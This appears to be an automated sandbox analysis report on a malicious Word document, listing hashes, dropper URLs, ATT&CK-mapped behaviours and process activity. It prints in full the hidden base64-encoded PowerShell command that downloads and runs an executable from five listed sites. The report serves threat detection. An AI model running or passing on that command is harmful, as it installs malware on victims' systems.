58284dd1bedbf2c82204eb15cdad07525a70b52ff1729e051ac101c066531ce3

General

Target

292fc1154bbe613521acfa3ab69da24d_JaffaCakes118.doc
Size

247KB
MD5

292fc1154bbe613521acfa3ab69da24d
SHA1

d89cb8fee32378fab48c4af4073d0b1f4977f2b8
SHA256

58284dd1bedbf2c82204eb15cdad07525a70b52ff1729e051ac101c066531ce3
SHA512

739f5ad0af89e7429e2fe2c67a8579093b1c78b7c85a287e91c2fe46224f334f3f70cea86c9e1ddb6972e4169bd273567c9b40fa3d895173130fb445b0dc58aa
SSDEEP

6144:30Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+7y6aboRTa:30E3dxtR/iU9mvUP7paboRm

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://zhangpalace.com/wp-admin/kfcuow/

exe.dropper

http://raquelstrutz.edutrovao.com.br/wp-includes/mhj4x/

exe.dropper

http://hoem.staging.pixelcarve.net/content/YLcMZTn/

exe.dropper

https://mdspgrp.com/wp-includes/g6tj/

exe.dropper

http://lula.vm-host.net/wp-content/ewww/wvo4jx/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1560	3764	Powershell.exe	83

Blocklisted process makes network request 4 IoCs

flow	pid	Process
25	1560	Powershell.exe
28	1560	Powershell.exe
31	1560	Powershell.exe
46	1560	Powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1560	Powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
2520	WINWORD.EXE
2520	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1560	Powershell.exe
1560	Powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1560	Powershell.exe

Suspicious use of SetWindowsHookEx 9 IoCs

pid	Process
2520	WINWORD.EXE
2520	WINWORD.EXE
2520	WINWORD.EXE
2520	WINWORD.EXE
2520	WINWORD.EXE
2520	WINWORD.EXE
2520	WINWORD.EXE
2520	WINWORD.EXE
2520	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\292fc1154bbe613521acfa3ab69da24d_JaffaCakes118.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2520

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABTAGkAawBxAGoAbgBhAGYAeABuAGEAYwA9ACcARQBoAHcAZwBsAG4AZQBnACcAOwAkAFoAeABiAGgAawB3AG8AYwB3ACAAPQAgACcANwAzADYAJwA7ACQARABhAHMAYwBxAGsAZQBoAHEAbQBwAD0AJwBEAHMAaABxAGcAdAB5AHYAbABlAGcAcABzACcAOwAkAEIAcgBsAGUAeABtAG8AbQBmAGgAdwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAWgB4AGIAaABrAHcAbwBjAHcAKwAnAC4AZQB4AGUAJwA7ACQAVwByAG0AbwBjAGIAZgBuAGkAZAA9ACcAVwB2AHoAcQBvAGYAeQBjACcAOwAkAE0AcgB6AHcAbwBmAHYAYwBpAHMAYwA9ACYAKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAATgBlAFQALgB3AEUAQgBjAEwASQBFAG4AVAA7ACQARABlAGMAYgBiAHQAYwBoAGIAdQBrAHQAcgA9ACcAaAB0AHQAcAA6AC8ALwB6AGgAYQBuAGcAcABhAGwAYQBjAGUALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGsAZgBjAHUAbwB3AC8AKgBoAHQAdABwADoALwAvAHIAYQBxAHUAZQBsAHMAdAByAHUAdAB6AC4AZQBkAHUAdAByAG8AdgBhAG8ALgBjAG8AbQAuAGIAcgAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAG0AaABqADQAeAAvACoAaAB0AHQAcAA6AC8ALwBoAG8AZQBtAC4AcwB0AGEAZwBpAG4AZwAuAHAAaQB4AGUAbABjAGEAcgB2AGUALgBuAGUAdAAvAGMAbwBuAHQAZQBuAHQALwBZAEwAYwBNAFoAVABuAC8AKgBoAHQAdABwAHMAOgAvAC8AbQBkAHMAcABnAHIAcAAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AZwA2AHQAagAvACoAaAB0AHQAcAA6AC8ALwBsAHUAbABhAC4AdgBtAC0AaABvAHMAdAAuAG4AZQB0AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGUAdwB3AHcALwB3AHYAbwA0AGoAeAAvACcALgAiAFMAUABgAGwAaQBUACIAKAAnACoAJwApADsAJABOAHoAegBqAHQAcgB2AGwAbQA9ACcAUwBrAHoAegBhAHoAdwB4AGUAegBuACcAOwBmAG8AcgBlAGEAYwBoACgAJABLAGEAaABtAGUAaQBjAHoAIABpAG4AIAAkAEQAZQBjAGIAYgB0AGMAaABiAHUAawB0AHIAKQB7AHQAcgB5AHsAJABNAHIAegB3AG8AZgB2AGMAaQBzAGMALgAiAGQAbwBgAFcAbgBMAE8AYABBAEQAZgBgAEkATABlACIAKAAkAEsAYQBoAG0AZQBpAGMAegAsACAAJABCAHIAbABlAHgAbQBvAG0AZgBoAHcAKQA7ACQAQwB6AGwAbwByAGoAdAB1AHMAcQBkAD0AJwBUAGgAbgBzAHcAcQBpAG8AZABrAGEAJwA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABCAHIAbABlAHgAbQBvAG0AZgBoAHcAKQAuACIAbABFAG4AYABnAFQASAAiACAALQBnAGUAIAAzADMAMAA0ADkAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBgAFQAYQByAFQAIgAoACQAQgByAGwAZQB4AG0AbwBtAGYAaAB3ACkAOwAkAEIAZQBvAGcAYQBhAGkAaAB0AD0AJwBUAGMAZQB0AGEAdQB2AG4AawAnADsAYgByAGUAYQBrADsAJABKAG0AYwB3AHEAYwB5AHAAawB4AGQAPQAnAFAAZABrAGMAbABoAG0AbwBoAGwAYwBuACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEMAcABlAGQAZABhAG4AdQBiAGQAZABqAD0AJwBFAHYAagBxAHoAbQBlAHgAawBzACcA
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1560

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kesbpgld.aso.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl

Filesize
263KB

MD5
ff0e07eff1333cdf9fc2523d323dd654

SHA1
77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

SHA256
3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

SHA512
b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

Download Submit
memory/1560-44-0x00007FFE2BE10000-0x00007FFE2C005000-memory.dmp

Filesize
2.0MB

Download
memory/1560-60-0x00007FFE2BE10000-0x00007FFE2C005000-memory.dmp

Filesize
2.0MB

Download
memory/1560-45-0x0000021362890000-0x00000213628B2000-memory.dmp

Filesize
136KB

Download
memory/2520-7-0x00007FFE2BE10000-0x00007FFE2C005000-memory.dmp

Filesize
2.0MB

Download
memory/2520-4-0x00007FFDEBE90000-0x00007FFDEBEA0000-memory.dmp

Filesize
64KB

Download
memory/2520-0-0x00007FFDEBE90000-0x00007FFDEBEA0000-memory.dmp

Filesize
64KB

Download
memory/2520-10-0x00007FFE2BE10000-0x00007FFE2C005000-memory.dmp

Filesize
2.0MB

Download
memory/2520-9-0x00007FFE2BE10000-0x00007FFE2C005000-memory.dmp

Filesize
2.0MB

Download
memory/2520-8-0x00007FFE2BE10000-0x00007FFE2C005000-memory.dmp

Filesize
2.0MB

Download
memory/2520-12-0x00007FFE2BE10000-0x00007FFE2C005000-memory.dmp

Filesize
2.0MB

Download
memory/2520-13-0x00007FFDE9630000-0x00007FFDE9640000-memory.dmp

Filesize
64KB

Download
memory/2520-11-0x00007FFE2BE10000-0x00007FFE2C005000-memory.dmp

Filesize
2.0MB

Download
memory/2520-14-0x00007FFE2BE10000-0x00007FFE2C005000-memory.dmp

Filesize
2.0MB

Download
memory/2520-15-0x00007FFDE9630000-0x00007FFDE9640000-memory.dmp

Filesize
64KB

Download
memory/2520-27-0x00007FFE2BE10000-0x00007FFE2C005000-memory.dmp

Filesize
2.0MB

Download
memory/2520-28-0x00007FFE2BE10000-0x00007FFE2C005000-memory.dmp

Filesize
2.0MB

Download
memory/2520-6-0x00007FFE2BE10000-0x00007FFE2C005000-memory.dmp

Filesize
2.0MB

Download
memory/2520-5-0x00007FFDEBE90000-0x00007FFDEBEA0000-memory.dmp

Filesize
64KB

Download
memory/2520-3-0x00007FFE2BEAD000-0x00007FFE2BEAE000-memory.dmp

Filesize
4KB

Download
memory/2520-1-0x00007FFDEBE90000-0x00007FFDEBEA0000-memory.dmp

Filesize
64KB

Download
memory/2520-2-0x00007FFDEBE90000-0x00007FFDEBEA0000-memory.dmp

Filesize
64KB

Download
memory/2520-534-0x00007FFE2BE10000-0x00007FFE2C005000-memory.dmp

Filesize
2.0MB

Download
memory/2520-544-0x00007FFE2BE10000-0x00007FFE2C005000-memory.dmp

Filesize
2.0MB

Download
memory/2520-545-0x00007FFE2BE10000-0x00007FFE2C005000-memory.dmp

Filesize
2.0MB

Download
memory/2520-567-0x00007FFDEBE90000-0x00007FFDEBEA0000-memory.dmp

Filesize
64KB

Download
memory/2520-568-0x00007FFDEBE90000-0x00007FFDEBEA0000-memory.dmp

Filesize
64KB

Download
memory/2520-566-0x00007FFDEBE90000-0x00007FFDEBEA0000-memory.dmp

Filesize
64KB

Download
memory/2520-569-0x00007FFDEBE90000-0x00007FFDEBEA0000-memory.dmp

Filesize
64KB

Download
memory/2520-570-0x00007FFE2BE10000-0x00007FFE2C005000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads